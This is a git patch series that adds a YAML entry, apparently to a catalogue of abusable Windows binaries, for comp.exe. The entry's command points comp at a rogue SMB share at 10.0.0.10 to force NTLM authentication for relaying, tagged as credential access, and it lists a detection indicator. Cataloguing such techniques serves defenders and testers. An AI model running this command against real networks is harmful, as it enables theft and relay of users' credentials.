From a78e06644114d8dcc730889bdf5d2a4333e854ce Mon Sep 17 00:00:00 2001 From: Kousha Zanjani <36133745+kousha1999@users.noreply.github.com> Date: Tue, 13 Feb 2024 12:17:36 +0330 Subject: [PATCH 1/4] Create Comp.yml --- yml/OSBinaries/Comp.yml | 1 + 1 file changed, 1 insertion(+) create mode 100644 yml/OSBinaries/Comp.yml diff --git a/yml/OSBinaries/Comp.yml b/yml/OSBinaries/Comp.yml new file mode 100644 index 00000000..8b137891 --- /dev/null +++ b/yml/OSBinaries/Comp.yml @@ -0,0 +1 @@ + From d61d79b7c5646ceb860c179cd9c78a7054819c4a Mon Sep 17 00:00:00 2001 From: Kousha Zanjani <36133745+kousha1999@users.noreply.github.com> Date: Tue, 13 Feb 2024 13:38:06 +0330 Subject: [PATCH 2/4] Update Comp.yml --- yml/OSBinaries/Comp.yml | 26 +++++++++++++++++++++++++- 1 file changed, 25 insertions(+), 1 deletion(-) diff --git a/yml/OSBinaries/Comp.yml b/yml/OSBinaries/Comp.yml index 8b137891..a722b8dd 100644 --- a/yml/OSBinaries/Comp.yml +++ b/yml/OSBinaries/Comp.yml @@ -1 +1,25 @@ - +--- +Name: Comp.exe +Description: Used to compares the contents of two files or sets of files byte-by-byte +Author: 'Kousha Zanjani' +Created: 2024-02-13 +Commands: + - Command: comp /M \\10.0.0.10\ fake.txt + Description: Tries to compare a file from rogue SMB Share with a fake.txt file + Usecase: Relay a NTLM authentication + Category: Credentials + Privileges: User + MitreID: T1187 + OperatingSystem: Windows XP, Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 +Full_Path: + - Path: C:\Windows\System32\comp.exe + - Path: C:\Windows\SysWOW64\comp.exe +Code_Sample: + - Code: +Detection: + - IOC: comp.exe retrieving files from remote server +Resources: + - Link: https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/comp +Acknowledgement: + - Person: Kousha Zanjani + Handle: From 0e269e02dc7ad161cff61a3141def0bae3c55656 Mon Sep 17 00:00:00 2001 From: Kousha Zanjani <36133745+kousha1999@users.noreply.github.com> Date: Tue, 13 Feb 2024 13:45:46 +0330 Subject: [PATCH 3/4] Update Comp.yml - Removing trailing spaces --- yml/OSBinaries/Comp.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/yml/OSBinaries/Comp.yml b/yml/OSBinaries/Comp.yml index a722b8dd..f56100b7 100644 --- a/yml/OSBinaries/Comp.yml +++ b/yml/OSBinaries/Comp.yml @@ -22,4 +22,4 @@ Resources: - Link: https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/comp Acknowledgement: - Person: Kousha Zanjani - Handle: + Handle: From b6e87c1a062df8fe3b139b493f0582df19aa1de5 Mon Sep 17 00:00:00 2001 From: Kousha Zanjani <36133745+kousha1999@users.noreply.github.com> Date: Tue, 13 Feb 2024 14:07:09 +0330 Subject: [PATCH 4/4] Update Comp.yml --- yml/OSBinaries/Comp.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/yml/OSBinaries/Comp.yml b/yml/OSBinaries/Comp.yml index f56100b7..77c09f12 100644 --- a/yml/OSBinaries/Comp.yml +++ b/yml/OSBinaries/Comp.yml @@ -6,7 +6,7 @@ Created: 2024-02-13 Commands: - Command: comp /M \\10.0.0.10\ fake.txt Description: Tries to compare a file from rogue SMB Share with a fake.txt file - Usecase: Relay a NTLM authentication + Usecase: Relay a NTLM authentication over SMB Category: Credentials Privileges: User MitreID: T1187